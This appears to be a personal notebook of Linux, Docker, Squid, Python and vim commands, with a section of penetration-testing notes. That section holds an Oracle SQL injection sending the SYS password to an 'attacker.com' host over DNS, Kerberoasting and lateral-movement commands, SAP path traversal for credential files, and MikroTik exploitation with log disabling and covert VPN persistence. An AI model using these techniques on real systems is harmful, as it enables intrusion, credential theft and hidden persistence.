This is a dump of things I learn as I go. It mostly contains notes on commands that I want to keep handy, and some of them come with little or no explanation. Feel free to explore though. :)
Enable the proxy_http module:
# a2enmod proxy_http
Create a VirtualHost that looks somewhat like this:
<VirtualHost *:80>
    ServerAdmin admin@gilgalab.com
    ServerName subdomain.domain.com.br
    ServerAlias subdomain.domain.com

    ProxyPass "/" "http://localhost/"
    ProxyPassReverse "/" "http://localhost/"

    <Proxy *>
        AuthType Basic
        AuthName "Authentication? What's that?"
        AuthUserFile /etc/apache2/.htpasswd
        Require valid-user
    </Proxy>

    # Possible values include: debug, info, notice, warn, error, crit,
    # alert, emerg.
    LogLevel debug

    ErrorLog ${APACHE_LOG_DIR}/error_somedomain.log
    CustomLog ${APACHE_LOG_DIR}/access_somedomain.log combined
</VirtualHost>
Edit the website VirtualHost and add this:
<Proxy *>
    AuthType Basic
    AuthName "Some message here"
    AuthUserFile /etc/apache2/.htpasswd
    Require valid-user
</Proxy>
Then create the .htpasswd file
# htpasswd -c /etc/apache2/.htpasswd username
Restart apache
# service apache2 restart
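To quickly check that the proxy is asking for credentials, something like this should do (hostname and username taken from the example above; curl prompts for the password):
$ curl -I -u username http://subdomain.domain.com.br/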
while :; do
    echo "This is infinite!"
    sleep 5
done
if [ ! -d "/tmp" ]; then
    echo "Directory /tmp does not exist"
else
    echo "It exists!"
fi
#!/bin/bash
while read -r line; do
    echo "Line = $line"
done < your_file.txt
echo "Script received $# args"
if [[ $# -lt 2 ]]; then
    echo "Expected at least 2 arguments to the script"
    exit 1
fi
now=$(date +"%Y.%m.%d %H:%M:%S")
echo "$now"
ctrl-a - move the cursor to the beginning of the current line
ctrl-e - move the cursor to the end of the current line
alt-b - move the cursor backwards one word
alt-f - move the cursor forward one word
ctrl-k - delete from cursor to the end of the line
ctrl-u - delete from cursor to the beginning of the line
alt-d - delete the word in front of the cursor
ctrl-w - delete the word behind the cursor
These are my notes as I learn about Docker.
In order to use the CLI, the current user needs to either be root or be part of the docker group.
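To add a user to that group, the usual way is something like the following, then log out and back in (keep in mind that docker group membership is effectively root-level access):
$ sudo usermod -aG docker $USER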
Create a Dockerfile, then run:
$ docker build -t <imagename> .
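For reference, a minimal Dockerfile might look something like this. It is only a sketch, assuming a trivial Python app that listens on port 80 (which is what the -p 4000:80 examples below map to the host):
# Base image (assumption: a small Python-based app)
FROM python:3-slim
WORKDIR /app
COPY . /app
# Port the container listens on; mapped to host port 4000 below
EXPOSE 80
CMD ["python3", "-m", "http.server", "80"]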
$ docker images
List the images and see which one you want to instantiate (that is, create a container from).
Then run:
$ docker run -d -p 4000:80 imagename
The above command creates a container from imagename. Supposing that the imagename image exposes port 80, that port will be mapped to the host's port 4000. The -d option tells Docker to start this container in the background.
$ docker login
$ docker run -p 4000:80 <username>/<repository>:<tag>
In my case, I created the friendlyhello repository with the v1 tag in my Docker Cloud, so I can run:
$ docker run -p 4000:80 typoon/friendlyhello:v1
$ docker ps
$ docker container ls
$ docker stop <id>
Where <id> is taken from the list of running containers.
First you need an account with Docker Cloud (or you need to setup your own registry). Go to https://cloud.docker.com and create an account.
Then run:
$ docker login
$ docker tag <imagename> <user>/<imagename>:<tag>
$ docker push <user>/<imagename>:<tag>
For example, I have created the friendlyhello image and want to give it a tag called v1, so I use:
$ docker tag friendlyhello typoon/friendlyhello:v1
$ docker push typoon/friendlyhello:v1
If I check the docker cloud website now, my image will be there.
$ docker build -t friendlyname .
$ docker run -p 4000:80 friendlyname
$ docker run -d -p 4000:80 friendlyname
$ docker ps
$ docker stop <hash>
$ docker ps -a
$ docker kill <hash>
$ docker rm <hash>
$ docker rm $(docker ps -a -q)
$ docker images -a
$ docker rmi <imagename>
$ docker rmi $(docker images -q)
$ docker login
Tag <image> for upload to registry:
$ docker tag <image> username/repository:tag
$ docker push username/repository:tag
$ docker run username/repository:tag
GET /_cat/indices?v
In order for the highlight field to return all the data in the target field, set the number_of_fragments option to 0. For example:
GET /idx/_search
{
  "size": 1,
  "_source": ["field1", "field2", "field3", "field4"],
  "query": {
    "regexp": {
      "field1": ".*whatever.*"
    }
  },
  "highlight": {
    "fields": {
      "field1": {"number_of_fragments": 0}
    }
  },
  "sort": [
    {
      "field4": {
        "order": "desc"
      }
    }
  ]
}
Getting interactive reverse shell
Using python:
python -c 'import pty; pty.spawn("/bin/bash")'
SSH User Enumeration
http://seclists.org/oss-sec/2018/q3/125
SQLi retrieval via DNS
This can be used against Oracle. Change the .attacker.com to a hostname you control.
SELECT title, publisher FROM books WHERE publisher = 'xpto'||UTL_INADDR.GET_HOST_NAME((SELECT PASSWORD FROM DBA_USERS WHERE USERNAME='SYS')||'.attacker.com')--
In order to use this, we need at least one valid DC user.
GetUserSPNs.py - retrieves service principal names (SPNs) from the DC
GetUserSPNs.py -request -dc-ip [domain-controller-ip] domain/username > hashes.txt
The retrieved hashes can be cracked with hashcat using -m 13100 (Kerberos 5 TGS-REP etype 23).
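Something along these lines should work (wordlist.txt is just a placeholder for whatever wordlist you prefer):
hashcat -m 13100 -a 0 hashes.txt wordlist.txt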
After you get the passwords, get the hostnames that are in the hashes.txt file and see if you can connect to some of them using the cracked passwords. Use smbclient.py for that.
smbclient.py "domain.com/username@server"
Use the shares command to see the available shares. Use the use command to connect to a share. Ideally we want to connect to the admin$ share to see if the user we have is an administrator on that box or not.
After this, you can use wmiexec.py to get an interactive shell on the remote machine if you have an admin user.
wmiexec.py "domain.com/username@server"
In this shell, you can try to get the names of the users in the "Domain Admins" group with the following command:
net group "Domain Admins" /domain
If the user you have is there, then you are done :D
apt install bloodhound neo4j
This thing is loud. Use the following bash function to launch it:
# run neo4j and bloodhound
bhound() {
    neo4j console 1>/dev/null 2>/dev/null &
    echo "[+] running neo4j at process id: $!"
    echo ""
    echo "[+] remember to change pass at localhost:7474"
    echo "[+] if bloodhound looks goofed up, hit Ctrl+R"
    echo ""
    echo "[+] ingestors:"
    echo "[*] /usr/lib/bloodhound/resources/app/Ingestors/SharpHound.exe"
    echo "[*] /usr/lib/bloodhound/resources/app/Ingestors/SharpHound.ps1"
    bloodhound
}
Find the Domain Controllers in the network
dig -t ANY _ldap._tcp.dc._msdcs.example.com
Replace example.com with the domain name used in the network.
List users in the box:
net users
List processes running:
tasklist.exe
List the services that are running:
sc query type= service
Stop a service
sc stop ServiceNameHere
If the above does not work, try:
runas /user:Administrator sc stop ServiceNameHere
Is the service marked as non stoppable?
Change its configuration so it won't automatically start, and then kill the process associated with the service. TODO: write down the commands here to do that.
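Until I write that down properly, the rough idea should be something like this (ServiceNameHere and <pid> are placeholders; sc queryex shows the PID to feed into taskkill):
sc config ServiceNameHere start= disabled
sc queryex ServiceNameHere
taskkill /PID <pid> /F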
Check out these links:
https://nest.parrotsec.org/security-tools/metasploit-framework/raw/36bae4066a05b66f2f572082d42e3b23f1e9c52d/data/wordlists/sap_icm_paths.txt
http://sap_server/scheduler/ -> Check the source of the page looking for UIUtilJavaScriptJS. The parameter to this endpoint can be used to read arbitrary files. For example:
UIUtilJavaScriptJS?../../../../../../../../../../../sap/DM0/SYS/global/security/data/SecStore.key
UIUtilJavaScriptJS?../../../../../../../../../../sap/DM0/SYS/global/security/data/SecStore.properties
Decrypt the SecStore.key file to get admin creds.
Check the aws-downloader.py script.
Find subdomains:
Find files / sensitive data:
Find credentials
Find the files key4.db and logins.json.
Click the hamburger menu and then click “Logins and Passwords”
TODO
TODO
Device logs: Access chrome://device-log
Stored passwords: Access chrome://settings/passwords
If the above does not work, the following might:
See stored passwords:
* Open Chrome.
* On the right side of the toolbar, click the circular Profile, then click Passwords.
* From there, you can view, delete, or export your saved passwords.
* View saved passwords: Click the eye icon to the right of each password to see it. You’ll be prompted to type your computer password in to see it in plain text.
* Delete saved passwords: Click the three vertical dots to the right of each password, then click Remove.
* Export saved passwords: To the right of “Saved Passwords,” click the three vertical dots, and click Export passwords.
There is a vulnerability in RouterOS that allows credentials to be retrieved from the router. You just need to be on the same network as the router, since the exploit works at Layer 2 (no need to have an IP address).
If you are sure that the router you are targeting is vulnerable but the exploit is not working, try changing your MAC address to a Mikrotik one (just clone the router's MAC address and change the value of the last octet).
Exploit here: https://github.com/BasuCert/WinboxPoC And here: https://github.com/hackerhouse-opensource/exploits/blob/master/mikrotik-jailbreak.txt
First thing to do as soon as you gain access to the router is disable logging:
/system logging
print
Replace X with the number of the logging entry in the table reported by the print command:
set X disabled=yes
A cool way to keep persistence on the router is to have it connect back to an OpenVPN server you own, and to make sure SSH is running on the Mikrotik router so you can connect back to it over the VPN.
Run the OpenVPN server on port 443 in order to make it less suspicious.
Here is the command to create the VPN:
/interface ovpn-client
add connect-to=IP_OpenVPN_Server mac-address=FE:A8:8E:09:CA:A0 name=ovpn-out1 password=OpenVPNpassword port=443 user=OpenVPNuser
If that does not work, there might be a firewall configured blocking access. Try the following commands to see if it opens up:
/ip firewall address-list
add address=YourIP list=default_management
add address=RoutersVPNip list=default_management
/ip firewall filter
add action=accept chain=forward comment="default configuration" src-address-list=default_management
Sometimes after the computer idles for a bit, my mouse stops working and I get errors in dmesg saying:
[2579695.232432] usb 1-2: new full-speed USB device number 81 using xhci_hcd
[2579695.232590] usb 1-2: Device not responding to setup address.
[2579695.440575] usb 1-2: Device not responding to setup address.
[2579695.648431] usb 1-2: device not accepting address 81, error -71
[2579695.648525] usb usb1-port2: unable to enumerate USB device
[2579696.780284] usb 1-2: new full-speed USB device number 82 using xhci_hcd
[2579696.912235] usb 1-2: device descriptor read/64, error -71
Disconnecting the device for a few seconds and then reconnecting it sometimes works. If that doesn’t work, try this (as root):
echo Y > /sys/module/usbcore/parameters/old_scheme_first
echo Y > /sys/module/usbcore/parameters/use_both_schemes
Then disconnect the device for a few seconds and reconnect it.
NOTE: this is most likely unrelated to the issue I have, but not sure what else to try at this point.
Not sure yet why this happens, or even if this solves the issue but should be worth trying.
As root, run:
echo XHC > /proc/acpi/wakeup
Check this post for more info: https://askubuntu.com/questions/987755/suspend-not-working-help-needed-to-debug
Lynis - https://cisofy.com/documentation/lynis/get-started/
Analyze traffic with wireshark and SSH.
ssh root@example.com tcpdump -w - 'port !22' | wireshark -k -i -
I had two laptops (A and B) connected to the same wifi.
When laptop A pinged the router, response time was around 3ms. When laptop B pinged the router, response time was around 3ms.
When laptop A pinged laptop B, response time was over 300ms.
Seems to be an issue with wireless card power. On both laptops, run:
sudo iwconfig wlan0 power off
Replace wlan0 with the name of your interface. Test pinging again.
For me, this solved the issue and pings between laptop A and B are now around 4ms.
If you are using the iwlwifi driver, what helped me was editing the /etc/modprobe.d/iwlwifi.conf file and adding the following lines to it:
options iwlwifi swcrypto=1
options iwlwifi 11n_disable=8
options iwlwifi bt_coex_active=0
Turn off wifi, reload the iwlwifi module (rmmod iwlwifi && modprobe iwlwifi), and check if it got any better.
mkdir /mnt/ramdisk
mount -t ramfs -o size=512M ramfs /mnt/ramdisk
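Note that ramfs ignores the size option, so the 512M above is not actually enforced. If you want the limit enforced, tmpfs should do it:
mount -t tmpfs -o size=512M tmpfs /mnt/ramdisk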
$ find / -perm -4000
$ find / -type f -perm -o+w
$ find / -iname '*.c' -exec grep password '{}' \;
$ pavucontrol
$ vmhgfs-fuse .host:ShareName dest_folder/
Create the volume (replace /dev/sdb1 with the partition of the volume to be encrypted):
# cryptsetup --cipher aes-xts-plain64 --hash sha256 -v --verify-passphrase luksFormat /dev/sdb1
Open the volume:
# cryptsetup luksOpen /dev/sdb1 somename
The above step creates a device at /dev/mapper/somename. This needs to be formatted now:
# mkfs.ext4 /dev/mapper/somename
Mount the encrypted volume now:
# mkdir /mnt/somename
# mount /dev/mapper/somename /mnt/somename
When done using the volume, don’t forget to unmount and close it:
# umount /mnt/somename
# cryptsetup luksClose /dev/mapper/somename
Now, in order to use the volume again, just do a luksOpen, mount the device that will appear under /dev/mapper, and you are good to go.
Not sure if negative pattern is the right term, but that’s how I wrote it.
These are ways of deleting a list of files that do not match a certain pattern.
For example, let's say you want to delete all files in a directory except the ones that end in .zip:
$ shopt -s extglob
$ rm -v !(*.zip)
$ shopt -u extglob
Another way using find:
$ find /dir/ -type f -not -name '*.zip' -delete
Source: https://www.tecmint.com/delete-all-files-in-directory-except-one-few-file-extensions/
We want Squid with SSL support, so we have to compile it ourselves. Download it from http://www.squid-cache.org/Versions/
Install dependencies:
apt-get -y install \
libcppunit-dev \
libsasl2-dev \
libxml2-dev \
libkrb5-dev \
libdb-dev \
libnetfilter-conntrack-dev \
libexpat1-dev \
libcap2-dev \
libldap2-dev \
libpam0g-dev \
libgnutls28-dev \
libssl-dev \
libdbi-perl \
libecap3 \
libecap3-dev
Compile with:
$ ./configure '--build=x86_64-linux-gnu' '--prefix=/usr' '--includedir=${prefix}/include' '--mandir=${prefix}/share/man' '--infodir=${prefix}/share/info' '--sysconfdir=/etc' '--localstatedir=/var' '--libexecdir=${prefix}/lib/squid3' '--srcdir=.' '--disable-maintainer-mode' '--disable-dependency-tracking' '--disable-silent-rules' 'BUILDCXXFLAGS=-g -O2 -fPIE -fstack-protector-strong -Wformat -Werror=format-security -Wl,-Bsymbolic-functions -fPIE -pie -Wl,-z,relro -Wl,-z,now' '--datadir=/usr/share/squid' '--sysconfdir=/etc/squid' '--libexecdir=/usr/lib/squid' '--mandir=/usr/share/man' '--enable-inline' '--disable-arch-native' '--enable-async-io=8' '--enable-storeio=ufs,aufs,diskd,rock' '--enable-removal-policies=lru,heap' '--enable-delay-pools' '--enable-cache-digests' '--enable-icap-client' '--enable-follow-x-forwarded-for' '--enable-auth-basic=DB,fake,getpwnam,NCSA,NIS' '--enable-auth-digest=file' '--enable-auth-negotiate=kerberos,wrapper' '--enable-auth-ntlm=fake' '--enable-external-acl-helpers=file_userip,session,SQL_session,unix_group,wbinfo_group' '--enable-url-rewrite-helpers=fake' '--enable-eui' '--enable-esi' '--enable-icmp' '--enable-zph-qos' '--enable-ecap' '--disable-translation' '--with-swapdir=/var/spool/squid' '--with-logdir=/var/log/squid' '--with-pidfile=/var/run/squid.pid' '--with-filedescriptors=65536' '--with-large-files' '--with-default-user=proxy' '--enable-build-info=Ubuntu linux' '--enable-linux-netfilter' 'build_alias=x86_64-linux-gnu' 'CFLAGS=-g -O2 -fPIE -fstack-protector-strong -Wformat -Werror=format-security -Wall' 'LDFLAGS=-Wl,-Bsymbolic-functions -fPIE -pie -Wl,-z,relro -Wl,-z,now' 'CPPFLAGS=-Wdate-time -D_FORTIFY_SOURCE=2' 'CXXFLAGS=-g -O2 -fPIE -fstack-protector-strong -Wformat -Werror=format-security' --with-openssl
$ make
$ make install
Create a file /etc/systemd/system/squid.service with the following contents:
## Downloaded from:
## https://raw.githubusercontent.com/squid-cache/squid/master/tools/systemd/squid.service
## Copyright (C) 1996-2019 The Squid Software Foundation and contributors
##
## Squid software is distributed under GPLv2+ license and includes
## contributions from numerous individuals and organizations.
## Please see the COPYING and CONTRIBUTORS files for details.
##
[Unit]
Description=Squid Web Proxy Server
Documentation=man:squid(8)
After=network.target network-online.target nss-lookup.target
[Service]
Type=forking
PIDFile=/var/run/squid.pid
ExecStartPre=/usr/sbin/squid --foreground -z
ExecStart=/usr/sbin/squid -sYC
ExecReload=/bin/kill -HUP $MAINPID
KillMode=mixed
[Install]
WantedBy=multi-user.target
Enable the service
systemctl enable squid
Here is a simple squid.conf for Squid 3 that requires the user to authenticate. It runs on port 9989.
Note: do not forget to replace the tls-cert and key values on the https_port line. I am using my Let's Encrypt cert here.
#http_access deny
auth_param basic program /usr/lib/squid/basic_ncsa_auth /etc/squid/passwords
auth_param basic realm Gilgalab
acl authenticated proxy_auth REQUIRED
http_access allow authenticated
forwarded_for delete
# Port
http_port 9987
https_port 9989 tls-cert=/etc/letsencrypt/live/www.gilgalab.com/fullchain.pem key=/etc/letsencrypt/live/www.gilgalab.com/privkey.pem
# Logs
access_log daemon:/var/log/squid/access.log squid
# Process configuration
cache_effective_user squid
cache_effective_group squid
dns_v4_first on
To create the users:
$ sudo htpasswd -c /etc/squid/passwords some_username
$ sudo service squid restart
powershell.exe -nologo -noprofile -command "(new-object System.Net.WebClient).Downloadfile(\"http://10.11.0.46/PSTools.zip\", \"c:\temp\PSTools.zip\")"
powershell.exe -nologo -noprofile -command "& { Add-Type -A 'System.IO.Compression.FileSystem'; [IO.Compression.ZipFile]::ExtractToDirectory('PSTools.zip', '.'); }"
runas
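If all you need is to run a single command as another user, runas by itself might be enough (it prompts for that user's password):
runas /user:Administrator cmd.exe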
Download PSTools from sysinternals and use:
psexec \\machine_name -u user -p password program.exe programargs
To properly format a heredoc string, use textwrap.dedent
import textwrap

mystr = """
    Hey!
    How are you?
    """

print(mystr)
print(textwrap.dedent(mystr))
SQLAlchemy seems to be the common way of dealing with SQL stuff in Python. There is also the DB-API, which is the basic Python layer for databases, but then you have to handle the different backends yourself.
Table creation in SQLAlchemy: see the short sketch after the links below.
Here is the documentation for Column:
https://docs.sqlalchemy.org/en/13/core/metadata.html#sqlalchemy.schema.Column
In order to specify the database to connect to, provide a database URL as explained here: https://docs.sqlalchemy.org/en/13/core/engines.html#database-urls
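A minimal table-creation sketch, assuming SQLAlchemy 1.3 Core and a throwaway in-memory SQLite database (the table and column names are just examples):
from sqlalchemy import create_engine, MetaData, Table, Column, Integer, String

# In-memory SQLite; see the database URLs doc above for other backends
engine = create_engine('sqlite://')
metadata = MetaData()

# Define a table with a couple of columns
users = Table('users', metadata,
              Column('id', Integer, primary_key=True),
              Column('name', String(50), nullable=False))

# Create the table(s) in the database
metadata.create_all(engine)

# Quick sanity check: insert a row and read it back
with engine.connect() as conn:
    conn.execute(users.insert().values(name='Gilgamesh'))
    print(list(conn.execute(users.select())))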
If you just need to serve the files in the current directory:
python3 -m http.server
If you want to define port and address to listen to
python3 -m http.server 9876 --bind 127.0.0.1
If you need a simple HTTP server in your code:
import http.server
import socketserver
ADDR = "127.0.0.1" # or blank to listen on 0.0.0.0
PORT = 8000
Handler = http.server.SimpleHTTPRequestHandler
with socketserver.TCPServer((ADDR, PORT), Handler) as httpd:
    print("Server started at %s:%d" % (ADDR, PORT))
    httpd.serve_forever()
These examples use the requests library.
pip3 install requests
import requests
cookies = {"cookie-name" : "cookie-value",
"other-cookie" : "other-value"
}
URL = 'https://www.gilgalab.com/python3/post-example'
data = {'param1': 'value', 'param2': 'value'}
proxies = {
'https' : 'https://localhost:8080',
'http' : 'http://localhost:8080'
}
r = requests.post(url=URL, data=data, cookies=cookies, proxies=proxies,
verify=False, allow_redirects=False)
print(r.text)
From the command line:
cat file.json | python3 -m json.tool
From code:
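A minimal sketch using the standard json module (file.json is just an example name):
import json

with open('file.json') as f:
    data = json.load(f)

# Pretty-print with 4-space indentation
print(json.dumps(data, indent=4))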
import base64
# Encode a string
mystr = 'abc'
encoded = base64.b64encode(mystr.encode('utf-8'))
decoded = base64.b64decode(encoded)
If you are having issues decoding strings, try using .decode('cp437')
If you want to use argument options when running a python script from the command line such as:
python3 somescript.py -name Gilgamesh -host gilgalab.com
Use the following:
import argparse
if __name__ == '__main__':
    segment_types = ['s1', 's2']
    fuzzer_types = ['ft1', 'ft2']

    # Create the argument parser
    parser = argparse.ArgumentParser()

    # Options that can be passed to the script
    # This is a required one
    parser.add_argument('-f', '--fuzzer', help='Type of fuzzer to use',
                        default='myfuzz', choices=fuzzer_types, required=True)

    # This one is not required
    parser.add_argument('-d', '--directory',
                        help='Where to save results',
                        default='fuzz-messages')

    # Just short option. Result goes into args.output due to `dest` param
    parser.add_argument(
        '-o', dest='output', help='Directory where to save stuff',
        required=True)

    # Options that are mutually exclusive (either one is accepted or the
    # other)
    group = parser.add_mutually_exclusive_group()
    group.add_argument('-a', '--all', help='Generate fuzzers for all types', action='store_true')
    group.add_argument('-s', '--segment', help='Segment name to generate a fuzzer for', choices=segment_types)

    args = parser.parse_args()

    # Properties in the `args` var will have the same name as the long
    # name of the parameter
    if args.all:
        segment_types = get_segment_types()
    elif args.segment:
        segment_types = [args.segment]

    # This check forces one of these parameters to be provided
    # (passing required=True to add_mutually_exclusive_group() would do the same)
    if not args.all and not args.segment:
        print("Can't find segments to generate fuzzer for. Aborting...")
        print("Did you give the program the `-a` or `-s` option?")
        exit(1)

    output_directory = args.directory
    fuzzer_type = args.fuzzer
Add the following to the start of the script
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
In a decent format:
import datetime
import time
now = datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d-%H%M%S')
Just run the application in debug mode:
$ export FLASK_ENV=development
$ flask run
Or in code
from flask import Flask
app = Flask(__name__)
app.run(debug=True)
With Python 3:
$ python3 -m http.server 8000 --bind 127.0.0.1
With Python 2:
$ python2 -m SimpleHTTPServer
$ python2 -c 'import BaseHTTPServer as bhs, SimpleHTTPServer as shs; bhs.HTTPServer(("127.0.0.1", 8888), shs.SimpleHTTPRequestHandler).serve_forever()'
# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
# generate server.pem with the following command:
# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# run as follows:
# python simple-https-server.py
# then in your browser, visit:
# https://localhost:4443
import BaseHTTPServer, SimpleHTTPServer
import ssl
httpd = BaseHTTPServer.HTTPServer(('localhost', 4443),
                                  SimpleHTTPServer.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile='./server.pem',
                               server_side=True)
httpd.serve_forever()
$ sudo apt-get install python-pyftpdlib
$ python -m pyftpdlib -p 21
$ cat file.json | python -m json.tool
import sys
try:
    somethingInvalid()
except:
    e = sys.exc_info()
    print("Exception: [%s][%s]" % (e[0], e[1]))
If vim is slow when you use it, there are a few tricks to try to figure out why.
First activate time measurement for syntax highlighting:
:syntime on
Navigate a little bit in the file and then:
:syntime report
Check which one of the highlights is taking too long.
If syntax is not the problem, it could be one of the plugin functions or files being loaded that is making things slow. For that, we need to profile those calls.
:profile start /tmp/vimprofile.log
:profile func *
:profile file *
Navigate around the file a little bit in a way that reproduces the slowdown being observed and then:
:profile pause
Examine the /tmp/vimprofile.log file now, looking for functions that are taking too long to execute or that are being executed too many times.
:%y+
% - Execute next command for all lines in buffer
y - Yank (copy)
+ - To the + buffer
Arduino plugin works only on .ino files.
Make sure to set the port where the Arduino is on the system, using:
:ArduinoChoosePort
Configure the path to the Arduino installation in the .vimrc file by setting the g:arduino_dir global variable.
Compile and verify
:ArduinoVerify
Compile and upload
<leader>au
Select board
<leader>ab